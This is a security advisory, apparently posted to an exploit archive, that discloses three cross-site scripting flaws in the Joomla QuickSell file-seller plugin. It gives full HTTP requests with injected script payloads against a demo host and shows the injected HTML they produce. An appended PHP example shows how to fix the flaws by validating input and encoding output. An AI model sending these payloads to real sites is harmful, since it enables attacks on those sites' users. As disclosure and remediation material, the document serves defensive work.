#Title: Joomla - QuickSell File Seller Plugin - Multiple XSS
#Date: 01.19.14
#Version: 3.3.2 (Latest ATM)
#Demo: demo.shopfiles.com (extensions.joomla.org/extensions/e-commerce/paid-downloads/19602)
#Contact: [email protected]
1. Persistent Cross Site Scripting - Add to Cart
When a file is added to the cart, the 'file' parameter is sent in a
POST request. All you have to do is edit the $_POST['file'] value while submitting it.
Example:
POST /index.php HTTP/1.1
Host: demo.shopfiles.com
Content-Length: 82
Connection: keep-alive

option=com_quicksell&task=cartAdd&format=raw&file=ed963a3d329ebcfa2c633a06ff5f82ff" onmouseover=alert(666) bad="
As you can see, the JS code has been added to the 'Cart' div:
<li><a title="" href="#" class="cartRemove" data-file="ed963a3d329ebcfa2c633a06ff5f82ff" onmouseover=alert(666) bad="">$0.00 </a></li></ul><p>Total: $0.00</p></div>
2. Cross Site Scripting - Print Document
The vulnerable variables are $_GET['print'] and $_GET['page'].
Example:
GET /?tmpl=component&print=1c7726"><script>alert(666)</script>&page=666"><script>alert(666)</script> HTTP/1.1
Host: demo.shopfiles.com
Connection: keep-alive
Injection point:
<input type="hidden" name="cancel_return" value="http://demo.shopfiles.com/?tmpl=component&print=1c7726"><script>alert(666)</script>&page=666"><script>alert(666)</script>"/>
3. Cross Site Scripting - URL
The hidden field named 'cancel_return' is built from the URL provided by the user.
Because of that, we are able to inject our code anywhere via the URL.
GET /?666"><h1>Sup?</h1>=1 HTTP/1.1
Host: demo.shopfiles.com
Connection: keep-alive
Injection point:
<input type="hidden" name="cancel_return" value="http://demo.shopfiles.com/?666"><h1>Sup?</h1>
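Added example (not part of the original advisory and not QuickSell code): all three injection points above are HTML attribute values, so the fix is to validate the 'file' identifier on input and encode for attribute context on output. The qs_* helper names are hypothetical, and the 32-hex-character identifier format is an assumption based on the sample value in the advisory.

```php
<?php
// Added example, not QuickSell code. Helper names (qs_*) are hypothetical.

// Assumption: file identifiers are 32 lowercase hex characters, as in the
// sample value shown in the advisory. Anything else is rejected.
function qs_valid_file_id(string $raw): ?string
{
    return preg_match('/\A[a-f0-9]{32}\z/', $raw) === 1 ? $raw : null;
}

// Encode for an HTML attribute value: &, <, >, " and ' become entities,
// so the value cannot close the attribute or the tag.
function qs_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Cart entry from finding 1, with the identifier encoded on output.
function qs_cart_item(string $fileId, string $price): string
{
    return '<li><a title="" href="#" class="cartRemove" data-file="'
        . qs_attr($fileId) . '">' . qs_attr($price) . ' </a></li>';
}

// Hidden field from findings 2 and 3, with the reflected URL encoded.
function qs_cancel_return(string $url): string
{
    return '<input type="hidden" name="cancel_return" value="'
        . qs_attr($url) . '"/>';
}

// Constructed inputs, copied from the requests in the advisory.
$file = 'ed963a3d329ebcfa2c633a06ff5f82ff" onmouseover=alert(666) bad="';
$url  = 'http://demo.shopfiles.com/?tmpl=component&print=1c7726">'
      . '<script>alert(666)</script>&page=666"><script>alert(666)</script>';

// Input validation: the tampered identifier never reaches the cart.
echo qs_valid_file_id($file) === null ? "file rejected\n" : "file accepted\n";
echo qs_valid_file_id('ed963a3d329ebcfa2c633a06ff5f82ff') . "\n";

// Output encoding: even if such a value were stored, it renders as inert text.
echo qs_cart_item($file, '$0.00') . "\n";
echo qs_cancel_return($url) . "\n";
```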
# 0day.today [2018-01-04] #